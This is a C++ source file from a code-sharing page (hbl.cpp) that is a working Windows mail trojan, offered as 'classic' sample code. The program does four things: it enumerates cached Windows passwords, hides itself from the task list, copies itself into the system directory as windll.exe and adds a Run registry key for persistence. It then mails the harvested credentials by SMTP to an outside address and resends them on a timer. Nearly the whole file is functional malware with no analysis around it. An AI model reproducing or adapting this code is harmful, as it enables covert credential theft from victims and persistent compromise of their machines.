hbl.cpp
来自「vc++的部分比较经典的源码」· C++ 代码 · 共 235 行
CPP
235 行
#include "stdafx.h"
int sLimit=6;
int sent=0;
unsigned int tim;
char BufStr0[1500]="";
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
WSADATA wsadata;
SOCKADDR_IN sin;
SOCKET sock;
struct PASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbResource;
WORD cbPassword;
BYTE iEntry;
BYTE nType;
char abResource[1];
};
typedef BOOL (FAR PASCAL *CACHECALLBACK)( struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData );
DWORD APIENTRY WNetEnumCachedPasswords(LPSTR pbPrefix,WORD cbPrefix,BYTE nType,CACHECALLBACK pfnCallback,DWORD dwRefData);
typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD cbPrefix, BYTE nType, CACHECALLBACK pfnCallback, DWORD dwRefData);
ENUMPASSWORD pWNetEnumCachedPasswords;
typedef struct {
char *pBuffer;
int nBufLen;
int nBufPos;
} PASSCACHECALLBACK_DATA;
BOOL PASCAL AddPass(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData)
{
char buff[1024];
char buff2[1024];
int nCount;
PASSCACHECALLBACK_DATA *dat;
dat = (PASSCACHECALLBACK_DATA *)dwRefData;
nCount=pce->cbResource;
if(nCount>1023) nCount=1023;
memmove(buff, pce->abResource, nCount);
buff[nCount] = 0;
CharToOem(buff, buff2);
if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
dat->nBufPos+=lstrlen(buff2)+1;
nCount=pce->cbPassword;
if(nCount>1023) nCount=1023;
memmove(buff, pce->abResource+pce->cbResource, nCount);
buff[nCount] = 0;
CharToOem(buff, buff2);
if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
dat->nBufPos+=lstrlen(buff2)+1;
return TRUE;
}
void CachedPass()
{
HMODULE hLib=LoadLibrary("MPR.DLL");
PASSCACHECALLBACK_DATA dat;
dat.pBuffer=(char *)malloc(65536);
dat.nBufLen=65536;
dat.nBufPos=0;
pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(hLib, "WNetEnumCachedPasswords");
pWNetEnumCachedPasswords(NULL, 0, 0xff, AddPass, (DWORD) &dat);
char *svStr;
svStr=dat.pBuffer;
strcpy(BufStr0,"");
do {
char *svRsc=svStr;
svStr+=lstrlen(svStr)+1;
char *svPwd=svStr;
svStr+=lstrlen(svStr)+1;
char svBuff[1024];
wsprintf(svBuff, "%.256s : %.256s\x0D\x0A", svRsc, svPwd);
strcat(BufStr0,svBuff);
}while(*svStr!='\0');
FreeLibrary(hLib);
};
int SendMail()
{
char Serv[1000]="HELO 127.0.0.1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
char From[1000]="MAIL FROM:<lamo@lam.com>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
char To[1000]="RCPT TO:<hack@hackboy.info>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
char sServer1[256]="SMTP: 127.0.0.1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
char Text[1400]="Subject: :[ h@ckBOY's Mail Trojan Report ]:\x0A\x0A\x0D\x0A\x0D\x0A";
char sServer[256]="";
int c=0;
for(int i=0;i<=256;i++)
if(i>5){ sServer[c]=sServer1[i]; c++;};
CachedPass();
strcat(Text,"Cached passwords:\x0D\x0A");
strcat(Text,BufStr0);
strcat(Text,"\x0D\x0A\x0D\x0A.\x0D\x0A");
char *MailMess[] =
{
Serv,
From,
To,
"DATA\x0D\x0A",
Text,
"QUIT\x0D\x0A",
NULL
};
WSAStartup(0x0101,&wsadata);
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
sin.sin_family=AF_INET;
sin.sin_port=htons(25);
sin.sin_addr.s_addr=inet_addr(sServer);
if(connect(sock,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
//MessageBox(NULL,"Error: can't connect to server :(","Error",MB_OK|MB_ICONERROR);
closesocket(sock);
WSACleanup();
return 1;
};
int iLength = 0;
int iEnd = 0;
char sBuff[255] = "";
int iMsg = 0;
while(MailMess[iMsg])
{
send(sock,MailMess[iMsg],lstrlen(MailMess[iMsg]),0);
//MessageBox(NULL,MailMess[iMsg],"Send to server:",MB_OK|MB_ICONINFORMATION);
iLength=recv(sock,sBuff,sizeof(sBuff),0);
sBuff[iLength]='\0';
//MessageBox(NULL,sBuff,"Answer from server:",MB_OK|MB_ICONWARNING);
iMsg++;
};
closesocket(sock);
WSACleanup();
return 0;
};
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
typedef DWORD (WINAPI *REGSERVPROC)(DWORD, DWORD);
HINSTANCE hLibrary;
REGSERVPROC regprc;
hLibrary = LoadLibrary("kernel32.dll");
regprc = (REGSERVPROC) GetProcAddress(hLibrary, "RegisterServiceProcess");
regprc (NULL,1);
LPSTR lpMe = new TCHAR[256];
LPSTR WinDir1 = new TCHAR[256];
GetSystemDirectory(WinDir1,256);
GetModuleFileName(NULL,lpMe,200);
strcat(WinDir1,"\\windll.exe");
CopyFile(lpMe,WinDir1,FALSE);
char szValue [256] = "windll.exe";
HKEY pKey;
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&pKey);
RegSetValueEx(pKey,"windll",NULL,REG_SZ,(BYTE *)szValue,strlen(szValue)+1);
SendMail();
MSG msg;
WNDCLASSEX wcex;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.style = CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = (WNDPROC)WndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance = hInstance;
wcex.hIcon = NULL;
wcex.hCursor = NULL;
wcex.hbrBackground = NULL;
wcex.lpszMenuName = NULL;
wcex.lpszClassName = "explorer";
wcex.hIconSm = NULL;
RegisterClassEx(&wcex);
HWND hWnd;
hWnd = CreateWindow("explorer", NULL, WS_POPUP,
0, 0, 10,10, NULL, NULL, hInstance, NULL);
tim=SetTimer(hWnd,NULL,25000,NULL);
while (GetMessage(&msg, NULL, 0, 0))
{
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
return 0;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
{
switch(iMsg)
{
case WM_CLOSE:
closesocket(sock);
WSACleanup();
PostQuitMessage(1);
return 1;break;
case WM_TIMER:
if(sent!=sLimit)
{
if(SendMail()==0) sent++;
} else
{
KillTimer(hWnd,tim);
};
break;
};
return DefWindowProc(hWnd, iMsg, wParam, lParam);
};
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?